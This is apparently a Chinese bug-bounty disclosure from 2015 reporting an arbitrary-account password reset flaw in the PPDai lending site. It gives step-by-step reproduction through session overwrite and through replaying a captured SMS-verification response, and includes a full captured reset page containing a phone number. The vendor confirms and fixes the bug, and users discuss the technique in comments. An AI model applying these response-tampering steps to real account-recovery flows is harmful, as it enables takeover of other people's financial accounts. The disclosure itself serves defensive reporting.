2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-27: 细节向公众公开
晚上下班回来,挖挖漏洞,多么惬意的事情呀!废话不多说,拍拍贷存在任意用户密码重置漏洞,不是通过爆破哟,对于一个P2P平台来说可是毁灭级的,请引起重视!请叫我雷锋^_^
a.简单重置方式:1.手机注册个账号,然后找回密码,输入短信验证码,跳转到重置密码页,停住不动2.在同一个浏览器下新建窗口,找回要攻击的手机号,输入手机号(
*****836*****
),发送验证码,然后跳回步骤1重置密码页,输入密码即可重置被攻击的账号密码b.复杂重现方式:1、通过手机号找回密码时,可绕过短信验证码校验2、首先使用已知手机号码进行一次正常的找回密码流程,记录第二步(验证手机)时返回的响应包,如下:
HTTP/1.1 200 OKServer: gwsDate: Thu, 12 Mar 2015 13:24:23 GMTContent-Type: text/html; charset=utf-8Connection: keep-aliveCache-Control: privateX-Powered: P118Content-Length: 13941<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /><title>重置密码-拍拍贷</title><meta name="description" content="拍拍贷,中国首家,最大、最多人使用的互联网金融P2P(人人贷)网络借贷平台。提供小额贷款,短期贷款,个人贷款,抵押,无抵押贷款服务。利率自定,借期灵活。您还可以成为借出人理财借贷投资,获得高年收益率回报,超低门槛,超高收益。作为可信赖的投融资,理财,贷款,信贷平台,拍拍贷助您财富实现增值" /><meta name="keywords" content="网络贷款,民间借贷,小额贷款,无抵押贷款,信用贷款,网络借贷,借贷平台,拍拍贷,人人贷,投资理财,个人理财,p2p贷款,贷款,互联网金融,投融资" /><link href="http://ac.ppdaicdn.com/css/basic.min.css?v=0fa24dbb3be905897536f38ef8bb0db6" rel="stylesheet" type="text/css" /><link href="http://ac.ppdaicdn.com/css/layout.min.css?v=39e3b26af5ed6b7980896d5ae543f968" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/account.min.css?v=fd821385eca1c3074ae24c641c3147b2" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/bindAccount.min.css?v=9c882c05277b5e73da3ab1d5c81c8a9a" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/validation.min.css" rel="stylesheet" type="text/css" /></head><body> <!--头部--> <div class="PPD_header_nav" style="margin-bottom: 0;"> <div class="PPD_login_status"></div> </div> <div class="mainNav"> <div class="mainNav_inner clearfix w1000center"> <h1 class="logo"> <a href="http://www.ppdai.com/"> <img src="http://ac.ppdaicdn.com/img/logo.png" alt="ppdai logo" /> </a> </h1> <ul id="tabIcon"> <li class="hasSubMenu"> <a href="http://www.ppdai.com/lend">我要投资</a> <div class="subMenu"> <a href="http://www.ppdai.com/lend">我要借出</a> <a href="http://www.ppdai.com/product/list">彩虹计划</a> <a href="http://www.ppdai.com/debtdeal/AlldebtList/DebtList">如何借出</a> <a href="http://www.ppdai.com/help/principalprotection">本金保障</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/borrow">我要借款</a> <div class="subMenu"> <a href="http://www.ppdai.com/borrow">我要借入</a> <a href="http://www.ppdai.com/help/howtoborrow.html">如何借入</a> <a href="http://www.ppdai.com/borrow/interestcalculate">利息计算器</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/account" class="tabon">我的账户</a> <div class="subMenu"> <a href="http://www.ppdai.com/account/borrow">借款账户</a> <a href="http://www.ppdai.com/account/lend">投资账户</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/help/aboutus">关于拍拍贷</a> <div class="subMenu"> <a href="http://www.ppdai.com/help/aboutus">关于我们</a> <a href="http://www.ppdai.com/help/howworks">工作原理</a> <a href="http://www.ppdai.com/help/fees">资费说明</a> </div> </li> </ul> </div> </div> <!--头部结束--> <div class="main" style="padding-top: 10px;margin-bottom: 20px;"> <div class="my-frame"> <div class="oneRow"> <h3 class="title">重置密码</h3> <div class="resetPasswprd"> <div class="resetPasswprd_top"> <ul class="clearfix"> <li><a href="/User/ResetPassword?Step=First&Way=Email&Redirect=">用【绑定邮箱】重置密码</a></li> <li><a href="javascript:;" class="current">用【绑定手机】重置密码</a></li> </ul> </div> <form action="/User/ResetPassword" id="resetpassword_mobile" method="POST"> <input type="hidden" name="Redirect" /> <input type="hidden" name="Way" value="Mobile" /> <input type="hidden" name="Step" value="Fourth" /> <input type="hidden" name="Email" value="" /> <input type="hidden" name="MobilePhone" value="13828840869" /> <div class="resetPasswprd_step resetPasswprd_mobilestep3"></div> <div class="resetPasswprd_form"> <ul> <li class="clearfix"> <label>新密码:</label> <input type="password" id="newPassword" name="NewPassword" maxlength="16" data-validation-engine="validate[required ,maxSize[16],minSize[8],custom[password]]" /> <div class="formErrorMsg"></div> <em>请使用8-16个字符的英文字母、符号和数字的组合</em> </li> <li class="clearfix"> <label>密码强度:</label> <i id="passstrong" class="weak"></i> </li> <li class="clearfix"> <label>确认新密码:</label> <input type="password" id="confirmPassword" name="NewPasswordConfirm" maxlength="16" data-validation-engine="validate[required ,maxSize[16],minSize[8],custom[password]]" /> <div class="formErrorMsg"></div> <em>请再输入一次新密码</em> </li> </ul> <div class="subBtn"><input type="submit" value="提交" /></div> </div> </form> </div> </div> <p class="formExplain oneRowFormExplain">温馨提示:若无法通过上述方法找回,建议您<a href="/User/Register" target="_blank">重新注册 </a> 。</p> </div></div><input type="hidden" id="hid_formaction" value="/User/ResetPassword" /><input type="hidden" id="hid_code" value="1" /><input type="hidden" id="hid_way" value="Mobile" /><input type="hidden" id="hid_step" value="Fourth" /><input type="hidden" id="hid_email" value="" /><input type="hidden" id="hid_mobile" value="13828840869" /> <!--底部--><div class="footer"> <div class="footer_footerBottom"> <ul class="footer_footerBottomNav clearfix"> <li><span class="webindex"></span><a href="http://www.ppdai.com/">网站首页</a>|</li> <li><span class="aboutus"></span><a href="http://www.ppdai.com/help/aboutus">关于我们</a>|</li> <li><span class="mapsite"></span><a href="http://www.ppdai.com/home/sitemap">网站地图</a>|</li> <li><span class="webservice"></span><a href="http://www.ppdai.com/consult">客服中心</a>|</li> <li class="nomr"><span class="onlneserve"></span><a href="http://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDAyNzUzNV8xODAzNjBfODAwMDI3NTM1XzJf" target="_blank">在线咨询</a></li> </ul> <p>Copyright Reserved 2007-2015©拍拍贷(www.ppdai.com) | 沪ICP备05063398号 | 上海拍拍贷金融信息服务有限公司</p> </div></div><!--底部结束--> <script src="http://ac.ppdaicdn.com/js/jquery.min.js" type="text/javascript" charset="utf-8"></script> <script src="http://ac.ppdai.com/status?v=2014" type="text/javascript" charset="utf-8"></script> <script src="http://ac.ppdaicdn.com/js/init.min.js?v=b4b9062f9a18117bea84881b45c26097" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> $(function () { $(".my-f-l-list li a.on").closest(".my-f-l-list").prev(".my-f-l-nav").addClass("my-f-l-nav-sd"); }); </script> <script src="http://ac.ppdaicdn.com/js/jquery.cookie.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/ppd_ac_utils.min.js?v=4b976b80b529343bf5bc44c69f2240ab" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/validation.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/validation-zh.min.js" type="text/javascript" charset="utf-8"></script><script type="text/javascript">$(function () { var acUtils = new PPDAcUtils("v1.0"); var code = $('#hid_code').val(); var way = $('#hid_way').val(); var step = $('#hid_step').val(); var email = $('#hid_email').val(); var mobile = $('#hid_mobile').val(); var remainTimeKey = way + '_resetpwd_remainTime'; var cookieObj = { expires: 1 / 24 / 60, path: '/', domain: '.ac.ppdai.com', secure: false }; $("#resetpassword_mobile").validationEngine(); $("#resetpassword_email").validationEngine(); function checkRemainTime(obj) { if (jQuery.cookie(remainTimeKey) && jQuery.cookie(remainTimeKey).length > 0) { acUtils.remainTime(obj, jQuery.cookie(remainTimeKey), null, '秒后重新发送', remainTimeKey, cookieObj); } } function init() { if ($('.getemailvalidata').length > 0) { checkRemainTime('.getemailvalidata'); if (step == 'Second') { $obj = $('.getemailvalidata'); if ($obj.attr('disabled') != 'disabled') { sendCode($obj); } } } else if ($('.getmobilevalidata').length > 0) { checkRemainTime('.getmobilevalidata'); if (step == 'Second') { $obj = $('.getmobilevalidata'); if ($obj.attr('disabled') != 'disabled') { sendCode($obj); } } } else { // } } setTimeout(init, 10); //第二步:邮箱/手机验证码 var sendCode = function ($obj) { acUtils.remainTime($obj, 60, null, '秒后重新发送', remainTimeKey, cookieObj); var formaction = $('#hid_formaction').val(); $.post(formaction, { Step: "Second", Way: way, Email: email, MobilePhone: mobile, IsAsync: true }, function (data) { if (data.Code == 1) { //acUtils.remainTime($obj, 60, null, '秒后重新发送', remainTimeKey, cookieObj); } else { alert(data.Message); } }); } $('.getemailvalidata, .getmobilevalidata').click(function () { sendCode($(this)); }); var passLength = function (s, minLen, $showObj) { if (s.length < minLen) { $showObj.removeAttr("class").addClass('weak'); return; } var a = -1; if (s.match(/[a-z]/ig)) { a++; } if (s.match(/[0-9]/ig)) { a++; } if (s.match(/(.[^a-z0-9])/ig)) { a++; } if (s.length < 6 && a > 0) { a--; } switch (a) { case 0: $showObj.removeAttr("class").addClass('weak'); break; case 1: $showObj.removeAttr("class").addClass('medium'); break; case 2: $showObj.removeAttr("class").addClass('strong'); break; default: $showObj.removeAttr("class").addClass('weak'); } }; $('#newPassword').bind('input propertychange', function () { passLength($('#newPassword').val(), 6, $('#passstrong')); });});</script> <!-- Google Tag Manager --> <noscript> <iframe src="//www.googletagmanager.com/ns.html?id=GTM-PVQ5D8" height="0" width="0" style="display: none; visibility: hidden"></iframe> </noscript> <script>(function (w, d, s, l, i) { w[l] = w[l] || []; w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' }); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = '//www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);})(window, document, 'script', 'dataLayer', 'GTM-PVQ5D8');</script><!-- End Google Tag Manager --> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fcfc74b94210e27ea643566ddece504a7' type='text/javascript'%3E%3C/script%3E")); </script></body></html>
3、再做一次找回密码操作,如下图,填写正确的手机号与验证码进入下一步
4、在第二步中提交任意的短信码(此处为111111),返回错误响应,如下:
5、用第一次重置密码操作得到的响应包替代此处,如下
6、释放请求后,进入重置密码页面,重置密码为1111qqqq
7、重置密码成功,可利用该密码成功登录系统
见漏洞详细说明下面貌似是你们投资人的账号
加强认证机制
危害等级:中
漏洞Rank:10
确认时间:2015-03-13 18:44
非常感谢反馈!本漏洞已修复。
暂无
你的方法麻烦了,有更简单的方式
三观颠覆
@浩天 直接编辑简单办法吧
关注
好的
@浩天 求大神介绍简单方法
@恋锋 你应该能看见了,厂商也应该仔细看看,颠覆我的人生观和安全观
@浩天 能加精华吗,呵呵
@浩天 应厂商要求,已对漏洞描述中的部分敏感字段进行屏蔽,请审核!
能取个名字叫异步重置吗,啊哈哈哈~
... 有点懵.. 三观颠覆
@恋峰 @浩天 我自己理解 fiddler 截断响应 把response失败响应改成先前的成功response 然后run 就会出现重置密码的页面? 并且页面上可以直接提交新设置的密码么? 这什么奇葩。。。。
颠覆了我的认知范围,谁能给点评下
@孔卡 cookie二次覆盖,靠cookie识别的身份
@浩天 我怎么感觉和这个漏洞 WooYun: 展程科技官网后台奇葩漏洞(任意账号均可登陆) 异曲同工呢? 嘿嘿 大牛有空回复下哈 @恋锋 回复下也可以 如果和这个漏洞一样的话 那么好理解很多
@孔卡 可以这么理解